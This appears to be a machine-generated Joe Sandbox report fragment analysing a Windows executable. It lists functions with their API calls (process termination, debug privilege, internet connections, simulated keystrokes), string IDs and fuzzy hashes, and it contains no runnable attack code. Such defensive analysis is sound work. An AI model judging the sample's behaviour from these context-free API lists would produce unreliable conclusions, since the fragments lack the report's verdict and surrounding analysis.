                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                      • API String ID: 858772685-4153970271
                                                                                      • Opcode ID: 1d704c6df06be654d75ac24afe2559653c40aa6242ed609af29a1408a694cddf
                                                                                      • Instruction ID: 38c1c07f5a12a2dd4208094548cd5fcc4386e03a94e9abae452c7ffe74779806
                                                                                      • Opcode Fuzzy Hash: 1d704c6df06be654d75ac24afe2559653c40aa6242ed609af29a1408a694cddf
                                                                                      • Instruction Fuzzy Hash: 1B219F3194021EABDF11EF90CC56EEE7775FF19304F04446AF619620A2EB71A658FB50
                                                                                      Function 00C7209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32 ref: 00C720AB
                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00C720C0
                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C7214D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameParentSend
                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                      • API String ID: 1290815626-3381328864
                                                                                      • Opcode ID: 5b6da6b951882f54b0f608cac06db99b046900c0e33308f9923cf85252afffc3
                                                                                      • Instruction ID: f70d2c4c38da9a05c22cb591a716ef7f677d4ab40e34257519503ab6d94eb39a
                                                                                      • Opcode Fuzzy Hash: 5b6da6b951882f54b0f608cac06db99b046900c0e33308f9923cf85252afffc3
                                                                                      • Instruction Fuzzy Hash: E8112976688706BBF6056621DC0BEAE379CEB05324F608027FB09A51D1FE616D016614
                                                                                      Function 00C48D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd5e4556ebef24e971687e57ba6ca0e9ef2e18baf40945c86cee1270c33ca44c
                                                                                      • Instruction ID: a2585ef04eb951dbbb6d72982fd4570435d36f54d3ab1c7e3340591c5d9ff7fc
                                                                                      • Opcode Fuzzy Hash: bd5e4556ebef24e971687e57ba6ca0e9ef2e18baf40945c86cee1270c33ca44c
                                                                                      • Instruction Fuzzy Hash: 4AC1E074D04259AFDB11DFA9D881BAEBBB0BF0D310F144099F824AB392C7758A46CB61
                                                                                      Function 00C4CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                      • String ID:
                                                                                      • API String ID: 1282221369-0
                                                                                      • Opcode ID: 9df3e06131223831e2837b77ec67e26b05d49207c6f1315b61f0b39406d63356
                                                                                      • Instruction ID: 6a6df60b8a69b5f323c692be2769586903405e2a0275a056f6ee6eb79ff79ddf
                                                                                      • Opcode Fuzzy Hash: 9df3e06131223831e2837b77ec67e26b05d49207c6f1315b61f0b39406d63356
                                                                                      • Instruction Fuzzy Hash: 33616A71905300AFEB21AFF49CC1B6E7BA5FF01310F14416DF9519B292DB3A9E4597A0
                                                                                      Function 00C28B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C66890
                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C668A9
                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C668B9
                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C668D1
                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C668F2
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C28874,00000000,00000000,00000000,000000FF,00000000), ref: 00C66901
                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C6691E
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C28874,00000000,00000000,00000000,000000FF,00000000), ref: 00C6692D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 1268354404-0
                                                                                      • Opcode ID: 645bf1a16091b128eb09ca0c0372c82b8946d83a9a5d1c6d9b72e49f9e244cef
                                                                                      • Instruction ID: ab0e2f196258d975cdfcf8ac231eca985152ae88c91506de8539ec2a5750b0b0
                                                                                      • Opcode Fuzzy Hash: 645bf1a16091b128eb09ca0c0372c82b8946d83a9a5d1c6d9b72e49f9e244cef
                                                                                      • Instruction Fuzzy Hash: 6E519770A00209EFDB20CF25DC95FAE7BB5EB48764F10451CF922976A0DB70EA90DB50
                                                                                      Function 00C8C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8C182
                                                                                      • GetLastError.KERNEL32 ref: 00C8C195
                                                                                      • SetEvent.KERNEL32(?), ref: 00C8C1A9
                                                                                        • Part of subcall function 00C8C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8C272
                                                                                        • Part of subcall function 00C8C253: GetLastError.KERNEL32 ref: 00C8C322
                                                                                        • Part of subcall function 00C8C253: SetEvent.KERNEL32(?), ref: 00C8C336
                                                                                        • Part of subcall function 00C8C253: InternetCloseHandle.WININET(00000000), ref: 00C8C341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 337547030-0
                                                                                      • Opcode ID: 3075cc331fd717c5f73d0793418f82b0ab5674fd047f3fa50a958fb1f24ede9a
                                                                                      • Instruction ID: d2c51bd56db1d81dc038c0dcc04fb8dfbadb800f5c09b8ba247af8cbb985e374
                                                                                      • Opcode Fuzzy Hash: 3075cc331fd717c5f73d0793418f82b0ab5674fd047f3fa50a958fb1f24ede9a
                                                                                      • Instruction Fuzzy Hash: 7E317E71100605AFDB21AFA5DC84B6BBBE8FF19308B00451DF96683660DB35E9149B74
                                                                                      Function 00C725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73A57
                                                                                        • Part of subcall function 00C73A3D: GetCurrentThreadId.KERNEL32 ref: 00C73A5E
                                                                                        • Part of subcall function 00C73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C725B3), ref: 00C73A65
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C725BD
                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C725DB
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C725DF
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C725E9
                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C72601
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C72605
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C7260F
                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C72623
                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C72627
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2014098862-0
                                                                                      • Opcode ID: d9f5be0954dad50d09e4815232f2ce8dc6ddc934d306b0f6d93290f8082dcd72
                                                                                      • Instruction ID: 9139499922229377cd2ceaaa17a91a7d8182d9235869dd06d5015e47a0b4f733
                                                                                      • Opcode Fuzzy Hash: d9f5be0954dad50d09e4815232f2ce8dc6ddc934d306b0f6d93290f8082dcd72
                                                                                      • Instruction Fuzzy Hash: 5F01D431390610BBFB2067A99CCAF5D3F59DB4EB56F104001F318AF0D1C9E22445AA69
                                                                                      Function 00C71803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C71449,?,?,00000000), ref: 00C7180C
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00C71449,?,?,00000000), ref: 00C71813
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71449,?,?,00000000), ref: 00C71828
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00C71449,?,?,00000000), ref: 00C71830
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00C71449,?,?,00000000), ref: 00C71833
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71449,?,?,00000000), ref: 00C71843
                                                                                      • GetCurrentProcess.KERNEL32(00C71449,00000000,?,00C71449,?,?,00000000), ref: 00C7184B
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00C71449,?,?,00000000), ref: 00C7184E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00C71874,00000000,00000000,00000000), ref: 00C71868
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1957940570-0
                                                                                      • Opcode ID: d9616213427ba3d3f3e94f1926e167d2d22922ead79c6cf9bd4540af8905f7d0
                                                                                      • Instruction ID: 9c52a490a50581d6f7a7321474b1ce357163cd5ed9608ceb0a3eeba52a503d36
                                                                                      • Opcode Fuzzy Hash: d9616213427ba3d3f3e94f1926e167d2d22922ead79c6cf9bd4540af8905f7d0
                                                                                      • Instruction Fuzzy Hash: 3401AC75340304BFE610ABA5DC89F9F3BACEB8AB15F014411FA05DB1A1DA7098108B20
                                                                                      Function 00C9A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C7D501
                                                                                        • Part of subcall function 00C7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C7D50F
                                                                                        • Part of subcall function 00C7D4DC: CloseHandle.KERNEL32(00000000), ref: 00C7D5DC
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9A16D
                                                                                      • GetLastError.KERNEL32 ref: 00C9A180
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9A1B3
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9A268
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00C9A273
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9A2C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                      • String ID: SeDebugPrivilege
                                                                                      • API String ID: 2533919879-2896544425
                                                                                      • Opcode ID: f8f2938022047fa2a6a2646f69726adb5b514847fad3b68b462ebe9ce90672de
                                                                                      • Instruction ID: 7ba9ae32f35acd34ba64c67d0cef97c7864c86ce52419e57f839fcadf9f35ac0
                                                                                      • Opcode Fuzzy Hash: f8f2938022047fa2a6a2646f69726adb5b514847fad3b68b462ebe9ce90672de
                                                                                      • Instruction Fuzzy Hash: CB618F30208641AFDB10DF19C498F59BBE1AF45318F14849CE46A8B7A3C772ED85DBD2
                                                                                      Function 00CA3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CA3925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00CA393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CA3954
                                                                                      • _wcslen.LIBCMT ref: 00CA3999
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CA39C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CA39F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2147712094-78025650
                                                                                      • Opcode ID: e57a9233ab9ec466a4d47bf5eff094f7c74b375b426052c03bca376b1f26a274
                                                                                      • Instruction ID: e2a71e6da2c224cc6d508aff93024528f8a43ac479ea660e99032ff33db5bc8a
                                                                                      • Opcode Fuzzy Hash: e57a9233ab9ec466a4d47bf5eff094f7c74b375b426052c03bca376b1f26a274
                                                                                      • Instruction Fuzzy Hash: F241C571A00259ABDF21DFA4CC45BEE77A9EF09358F100126F954E7281D7759E80CB90
                                                                                      Function 00C7BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7BCFD
                                                                                      • IsMenu.USER32(00000000), ref: 00C7BD1D
                                                                                      • CreatePopupMenu.USER32 ref: 00C7BD53
                                                                                      • GetMenuItemCount.USER32(0125EBC0), ref: 00C7BDA4
                                                                                      • InsertMenuItemW.USER32(0125EBC0,?,00000001,00000030), ref: 00C7BDCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: c6026f92ba96bde6e91278721007c04eec4d1a5ed3951e037e1bbd04fea28e60
                                                                                      • Instruction ID: 2c7828588ef46e1aefbac78fb2c6b9850165b144f641617b221f6cb88bf0886f
                                                                                      • Opcode Fuzzy Hash: c6026f92ba96bde6e91278721007c04eec4d1a5ed3951e037e1bbd04fea28e60
                                                                                      • Instruction Fuzzy Hash: 8C519E70A002059FDB21CFA9D8C4BAEBBF8AF65314F14C119F429D7299E770AE40CB51
                                                                                      Function 00C7C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00C7C913
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: 766abd51e050cbefa7670ee58b310f6e92352d146631cb2f736e7bfdc54cfe0a
                                                                                      • Instruction ID: ba686512ad9d0f5baab782692d26b31cdc72da8b929b5da70947680a4188122f
                                                                                      • Opcode Fuzzy Hash: 766abd51e050cbefa7670ee58b310f6e92352d146631cb2f736e7bfdc54cfe0a
                                                                                      • Instruction Fuzzy Hash: C7110D3268930BBAE7055B559CC3DEE679CDF15354F11403FF618A62C2D7706E006365
                                                                                      Function 00C6D3A2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C6D3AD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6D3BF
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C6D3E5
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C6D3FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                      • String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
                                                                                      • API String ID: 582185067-2904798639
                                                                                      • Opcode ID: dc5ff6cdd5c5ba8af3b7d2d841240a46ea8a6369c5a23025057ffce6a6c4cdd2
                                                                                      • Instruction ID: 8cc0e7e36621f18d04acdcbcdf50ee928a6c84f846017b24fa1d8b8fb625bc55
                                                                                      • Opcode Fuzzy Hash: dc5ff6cdd5c5ba8af3b7d2d841240a46ea8a6369c5a23025057ffce6a6c4cdd2
                                                                                      • Instruction Fuzzy Hash: 58F02770F462359BC77157519CE8B6D7334AF01B05F448065F603F7260DB30CE048AA1
                                                                                      Function 00C7ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$LocalTime
                                                                                      • String ID:
                                                                                      • API String ID: 952045576-0
                                                                                      • Opcode ID: 5decba3f534bc3102807fb4e01f40023d6f4c014888e9e653b73b314904bbc46
                                                                                      • Instruction ID: cd9475c3a134fbe95ea042d1655e2d1492bdcebd75af878cfd68192b1d222e48
                                                                                      • Opcode Fuzzy Hash: 5decba3f534bc3102807fb4e01f40023d6f4c014888e9e653b73b314904bbc46
                                                                                      • Instruction Fuzzy Hash: 4A419366C2021875CB11EBF4C88AACFB7ACAF49710F508962F518E3121FB35E655C3A6
